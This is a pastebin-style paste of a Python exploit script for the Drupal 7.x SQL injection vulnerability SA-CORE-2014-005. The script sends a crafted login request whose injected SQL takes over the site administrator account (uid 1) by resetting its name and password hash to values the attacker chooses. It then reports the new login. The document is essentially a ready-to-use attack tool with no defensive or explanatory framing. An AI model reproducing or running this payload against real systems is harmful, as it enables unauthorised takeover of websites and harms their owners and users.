SHARE
TWEET

Drupal 7.x SQL Injection SA-CORE-2014-005

a guest Oct 15th, 2014 12,930 Never
  1. #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
  2. #Creditz to https://www.reddit.com/user/fyukyuk
  3. import urllib2,sys
  4. from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  5. host = sys.argv[1]
  6. user = sys.argv[2]
  7. password = sys.argv[3]
  8. if len(sys.argv) != 3:
  9.     print "host username password"
  10.     print "http://nope.io admin wowsecure"
  11. hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
  12. target = '%s/?q=node&destination=node' % host
  13. post_data = "name[0%20;update+users+set+name%3d\'" \
  14.             +user \
  15.             +"'+,+pass+%3d+'" \
  16.             +hash[:55] \
  17.             +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
  18. content = urllib2.urlopen(url=target, data=post_data).read()
  19. if "mb_strlen() expects parameter 1" in content:
  20.         print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
RAW Paste Data
Top